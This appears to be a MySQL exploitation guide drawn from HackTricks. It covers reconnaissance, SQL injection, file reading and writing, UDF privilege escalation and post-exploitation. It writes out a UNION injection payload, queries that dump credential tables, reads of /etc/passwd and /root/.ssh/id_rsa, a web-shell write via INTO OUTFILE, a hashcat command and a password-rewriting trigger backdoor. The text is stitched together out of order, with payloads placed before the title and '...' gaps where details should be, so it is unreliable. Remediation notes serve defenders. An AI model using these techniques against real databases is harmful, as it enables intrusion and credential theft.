SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' OR column_name LIKE '%user%';
Dump interesting tables: SELECT * FROM users; SELECT * FROM credentials;
Example:
http://example.com/vulnerable-page?id=1 UNION SELECT NULL,NULL,NULL -- -
Last verified against: MySQL 8.0.36, MariaDB 10.11.6, Percona Server 8.0.
MySQL Security Assessment and Exploitation Framework

This paper outlines the core methodologies for assessing and exploiting MySQL databases, synthesized from the verified security research and techniques documented in HackTricks.

1. Abstract
As one of the most widely used relational database management systems, MySQL is a frequent target for attackers. This framework details verified exploitation vectors, ranging from initial reconnaissance to advanced privilege escalation, and gives security professionals a structured approach to identifying and mitigating MySQL-specific vulnerabilities.

2. Reconnaissance and Initial Access
The first stage of a MySQL assessment involves identifying the service and potential entry points.
Default Port Identification: Scanning for TCP port ...
Banner Grabbing: Connecting via ... to identify the specific version, which determines which known CVEs apply.
Authentication Testing: Testing for the root user with no password (common in misconfigured dev environments); brute-forcing credentials using tools like mysql-brute.

3. Exploitation Techniques
Once access is gained, several verified HackTricks techniques can be employed to deepen the compromise.

A. File System Interaction
If the secure_file_priv variable is empty or misconfigured, attackers can interact with the host OS:
Reading Files: LOAD DATA INFILE '/etc/passwd' INTO TABLE temp_table; to exfiltrate system configuration files.
Writing Shells: SELECT '' INTO OUTFILE '/var/www/html/shell.php'; to achieve Remote Code Execution (RCE).

B. Privilege Escalation via UDF
User Defined Functions (UDF) allow the execution of shared library functions.
Uploading a malicious ... (Linux) or ... (Windows) file to the plugin directory.
Executing system commands with the privileges of the user running the MySQL service (often ...).

C. Exploiting the "Old Passwords" Vulnerability
In legacy environments, MySQL may use the older, weaker 16-byte hashing algorithm, which is highly susceptible to fast offline cracking.

4. Bypassing Authentication (CVE-2012-2122)
On certain Linux distributions, a verified vulnerability allowed attackers to bypass authentication by repeatedly attempting to log in with an incorrect password. Due to a casting error, there was a 1 in 256 chance that the server would accept the wrong password as correct.

5. Post-Exploitation and Lateral Movement
Enumerating Users: Extracting hashes from mysql.user.
Sensitive Data Discovery: Automated scripts to search for "API", "password", or "key" across all schemas.
Stealing SSH Keys: LOAD_FILE() to check default locations like /root/.ssh/id_rsa.

6. Conclusion and Remediation
Securing MySQL requires a multi-layered approach:
Strict File Permissions: Configuring secure_file_priv to a dedicated, non-web-accessible directory.
Principle of Least Privilege: Disabling unneeded privileges for application users.
Network Isolation: Ensuring the database is only accessible via local sockets or a VPN, never exposed directly to the internet.
Triggers run statements automatically on INSERT, UPDATE, or DELETE against a table, so an attacker who can create one can use it to hide rogue actions.
DELIMITER //
-- Fires before each row is inserted into mysql.user and silently
-- rewrites the stored credential for one specific account name.
CREATE TRIGGER hide_user BEFORE INSERT ON mysql.user FOR EACH ROW
BEGIN
  IF NEW.User = 'hidden' THEN
    SET NEW.password = PASSWORD('dontlog');
  END IF;
END//
DELIMITER ;
Note: Requires SUPER or TRIGGER privilege. The statement as written only targets legacy servers: MySQL refuses to create triggers on system tables in the mysql schema (error 1465, "Triggers can not be created on system tables"), mysql.user has stored the credential in authentication_string rather than password since 5.7, and PASSWORD() was removed in 8.0. Defenders should still audit information_schema.TRIGGERS on any writable table, since a trigger there can alter or suppress rows without the application noticing.
This is the core of the guide. We assume you already have a low-privilege SQL user (e.g., obtained via SQLi or default credentials like root:root).
If secure_file_priv restricts you:
Verified Hashcat command (mode 300 is for MySQL 4.1+/5 hashes, the 41-character SHA1-based format beginning with '*'):
hashcat -m 300 hash.txt /usr/share/wordlists/rockyou.txt
Basic enumeration queries:
SELECT @@version, @@version_compile_os, @@version_compile_machine;   -- server version and host platform
SELECT user(), database(), current_user();                         -- connecting user, current schema, effective account
SELECT @@basedir, @@datadir, @@plugin_dir;                         -- install, data and plugin directories
HackTricks Insight:
current_user() shows the user MySQL is authenticating you as, while user() shows the user you tried to connect as. Mismatches often indicate proxy authentication or privilege mapping.